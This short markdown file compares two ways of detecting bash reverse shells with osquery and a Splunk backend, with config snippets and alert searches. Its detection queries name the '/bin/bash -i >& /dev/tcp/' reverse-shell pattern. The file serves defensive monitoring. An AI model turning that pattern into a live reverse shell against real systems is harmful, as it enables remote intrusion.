scenario.md

Scenario 1 - Detection logic in osquery, alerting logic on backend (Splunk/ELK/StreamAlert)

osquery.conf

"bash_reverse_shell": {
  "query": "SELECT * FROM processes WHERE cmdline LIKE '/bin/bash -i >& /dev/tcp/%';",
  "interval": 30,
  "description": "Looks for processes that resemble a bash reverse shell"
}

Splunk Alert

index=osquery name=bash_reverse_shell

Scenario 2 - Data collection in osquery, detection and alerting logic on backend

osquery.conf

"bash_reverse_shell": {
  "query": "SELECT * FROM process_events;",
  "interval": 10,
  "description": "Collect data about all running processes via process auditing"
}

Splunk Alert

index=osquery name=process_events columns.cmdline="/bin/bash -i >& /dev/tcp/*"